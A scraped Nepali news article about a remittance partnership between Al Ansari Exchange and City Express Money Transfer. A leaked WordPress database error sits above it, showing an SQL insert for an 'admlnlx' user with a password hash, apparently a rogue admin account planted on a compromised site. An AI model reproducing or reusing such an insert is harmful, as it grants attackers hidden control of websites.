WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZiUpYwNIReTlkFmtgbLRHq56OOllf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:14:40', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन २–
अल अन्सारी (क्यास एक्सप्रेस) युएई र सिटी एक्सप्रेस मनी ट्रान्सफरले यही २०१७ को फेब्रअरी महिनादेखि आपसी रूपमा नै रकम आदान–प्रदानको सेवा प्रदान गर्ने सम्झौता गरेका छन् । यो सम्झौताबाट अल अन्सारी (क्यास एक्सप्रेस) को नेपालमा सञ्जाल बिस्तार भएको छ । आगामी दिनदेखि नेपालमा रहेका सिटी एक्सप्रेसका कुनै पनि काउन्टरबाट रकम प्राप्त गर्न सकिने छ । यस सम्झौताबाट सिटी एक्सप्रेसको सेवामा पनि नयाँ आयाम थपिएको छ ।
अल अन्सारी (क्यास एक्सप्रेस) का महाप्रबन्धक रसिद अल अन्सारी भन्नुभयो “अल अन्सारी (क्यास एक्सप्रेस) ले नेपालमा आफ्नो सेवालाई सहज तथा छरितो बनाउने कसरत गरिरहेको छ जसबाट यूएईमा रहेका लाखौ नेपालीले बिना झन्झट आफूलाई पायक पर्ने समयमा नै नेपालमा रेमिटान्स प्राप्त गर्न सकून् ।”
सम्झौतामा हस्ताक्षर गर्ने कार्यक्रममा सिटी एक्सप्रेसका प्रबन्ध निर्देशक चन्द्र टण्डनले भन्नुभयो, “यूएईको सबैभन्दा बढि संजाल भएको रेमिटान्स सेवा प्रदायक अल अन्सारी (क्यास एक्सप्रेस) सँग सहकार्य गर्न पाउँदा हामी उत्साहित छौँ । हामीले यूएई लगाएत (क्यास एक्सप्रेस) बाट भित्रिने कोरोबारका लागि हाम्रा ५००० भन्दा बढी भुक्तानी केन्द्रहरूबाट अब सहज रूपले सेवा दिने कुरामा विश्वस्त छौँ ।”
यस्तो हो अल अन्सारी (क्यास एक्सप्रेस)
अल अन्सारी (क्यास एक्सप्रेस) यूएई मनी ट्रान्सफरको व्यवसायको लागी पूर्ण अनुमतिपत्र प्राप्त गरी कारोबार सञ्चालन गरिरहेको छ । अल अन्सारी (क्यास एक्सप्रेस) विगत ६० वर्षदेखि सञ्चालनमा छ । सदैव नवीन र उच्चकोटिको सेवा प्रदान गर्न यो संस्था तत्पर छ ।
यस्तो हो सिटी एक्सप्रेस मनी ट्रान्सफर
नेपालको एक अग्रणी सेवा प्रदायक कम्पनी सिटी एक्सप्रेस मनी ट्रान्सफरले नेपालका हरेक कुनामा सेवा पर्याई जापान, साउदी अरेबिया, कतारका साथै विभिन्न देशहरूबाट रकम नेपालमा भित्राउने सेवा उपलब्ध गराउँछ । थप जानकारीका लागि www.ctxpress.com लगईन गर्न सकिने छ ।